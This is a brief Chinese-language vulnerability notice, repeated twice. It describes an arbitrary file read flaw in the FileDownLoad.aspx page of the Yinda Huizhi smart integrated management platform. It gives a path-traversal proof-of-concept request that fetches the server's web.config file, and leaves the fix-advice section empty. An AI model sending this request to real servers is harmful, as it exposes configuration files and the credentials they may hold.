漏洞描述:
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件。
漏洞利用条件:
/
漏洞影响范围:
银达汇智 智慧综合管理平台
漏洞复现:
1.POC:/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config
修复建议:
/
漏洞描述:
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件。
漏洞利用条件:
/
漏洞影响范围:
银达汇智 智慧综合管理平台
漏洞复现:
1.POC:/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config
修复建议:
/